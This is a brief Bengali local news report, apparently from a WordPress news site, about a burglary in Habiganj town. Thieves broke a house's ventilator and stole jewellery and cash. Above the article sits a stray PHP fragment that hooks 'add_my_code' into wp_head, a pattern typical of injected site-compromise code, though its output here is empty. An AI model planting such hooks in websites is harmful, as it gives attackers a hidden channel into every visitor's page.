/***/function add_my_code() { echo ''; } add_action('wp_head', 'add_my_code');/***/ শহরে এক বাসার ভেন্টিলেটার ভেঙ্গে চুরি

,

শহরে এক বাসার ভেন্টিলেটার ভেঙ্গে চুরি

স্টাফ রিপোর্টার : হবিগঞ্জ শহরে চুরি-ছিনতাই মারাত্মকভাবে বৃদ্ধি পেয়েছে। প্রতিনিয়তই কোনো না কোনো বাসা-বাড়ি বা দোকানে চুরি হচ্ছে। পুলিশ অভিযান চালিয়েও তাদেরকে দমন করতে পারছে না।
গত ২০ মে গভীর রাতে আনোয়ারপুর কবরস্থান রোড এলাকার রীতা রাণী দাসের বাসার ভেন্টিলেটার ভেঙ্গে ভেতরে প্রবেশ করে তার স্বর্ণালংকারসহ নগদ টাকা নিয়ে যায় চোরের দল।
এ ঘটনায় এলাকায় চোর আতংক বিরাজ করছে। এ বিষয়ে রীতা রাণী দাস সদর থানাকে অবগত করেছেন। তিনি ওই এলাকার মৃত সত্যরঞ্জন দাসের স্ত্রী।


     এই বিভাগের আরো খবর
Copy Protected by Chetan's WP-Copyprotect.